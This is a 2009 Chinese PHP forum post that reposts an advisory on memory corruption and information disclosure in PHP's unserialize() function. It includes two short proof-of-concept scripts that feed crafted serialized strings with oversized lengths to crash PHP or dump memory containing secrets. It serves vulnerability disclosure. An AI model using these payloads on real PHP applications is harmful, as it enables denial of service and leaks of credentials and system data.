标题:
PHP unserialize()内存破坏和信息泄露漏洞
[打印本页]
作者:
fangzhen
时间:
2009-8-3 16:53
标题:
PHP unserialize()内存破坏和信息泄露漏洞
PHP是一种流行的WEB服务器端编程语言。 PHP unserialize()函数存在多个安全问题,远程攻击者可以利用这些漏洞进行缓冲区溢出攻击及获得文件信息。 unserialize()函数对输入缺少充分过滤,可导致内存破坏及信息泄露,如: "Segfault": ---cut here--- $s = 's:9999999:"A";"'; $a = unserialize($s); print $a; ?> ---cut here--- 另外利用此函数也可导致任意代码执行并泄露问和系统信息: EXAMPLE script - "Memory Dump": ---cut here--- // session- and stuff $secret_username="uaaaa"; $secret_password="hoschi"; // stuff // $c = $_COOKIE ['crypted_stuff'] // $c = some cookie /* simplyfied --> userinput */ $c = 's:30000:"crap";'; $userdata = unserialize($c); // // check $userdata stuff // for some reason output $userdata print $userdata . "\n is NOT valid !!\n"; // stuff ?> ---cut here---
欢迎光临 PHP开发笔记 (http://phpvi.com/)
Powered by Discuz! 6.1.0